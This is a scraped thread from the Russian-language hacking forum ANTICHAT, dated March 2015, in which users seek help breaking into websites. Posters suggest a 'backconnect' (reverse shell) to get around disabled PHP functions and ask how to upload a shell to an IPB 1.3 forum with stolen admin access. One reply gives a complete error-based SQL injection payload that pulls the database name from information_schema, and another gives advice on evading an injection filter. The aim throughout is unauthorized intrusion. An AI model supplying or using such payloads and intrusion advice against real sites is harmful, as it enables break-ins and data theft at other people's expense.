ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.03.2015, 01:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Если экранируется
|
|
|
|
27.03.2015, 01:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
[QUOTE="OxoTnik"]
OxoTnik said:
Если экранируется
|
|
|
27.03.2015, 11:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
168184
Репутация:
40
|
|
Сообщение от sysjuk
sysjuk said:
Disabled PHP Functions: exec,ini_get_all,parse_ini_file,passthru,php_uname ,popen,proc_open,shell_exec,show_source,system
как нибудь можно обойти эти ограничения?
Банально - запилить бэкконект.
|
|
|
|
27.03.2015, 16:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
69527
Репутация:
5
|
|
Сообщение от 5maks5
5maks5 said:
Банально - запилить бэкконект.
бэкконект не работает в этом все и дело.
|
|
|
|
27.03.2015, 17:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Не могу залиться в IPB 1.3. Доступ админа есть.
Пробовал через смайлы - не получилось.
Пробовал sql запросом - нет прав на запись.
Какие еще способы есть ?
|
|
|
|
27.03.2015, 17:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
|
|
|
|
27.03.2015, 17:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Сообщение от teh
teh said:
Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
попробуй так
Код:
Code:
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
|
|
|
|
27.03.2015, 18:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Сообщение от Vip77
Vip77 said:
попробуй так
Код:
Code:
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
спасибо, но так тоже не работает
|
|
|
|
28.03.2015, 04:01
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от teh
teh said:
Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
Попробуй сделать запрос без union либо без select , если отобразится страница, то пробуй обойти фильтр.
|
|
|
|
28.03.2015, 22:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Сообщение от kingbeef
kingbeef said:
Попробуй сделать запрос без union либо без select , если отобразится страница, то пробуй обойти фильтр.
ага, понял. Буду пробовать, спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
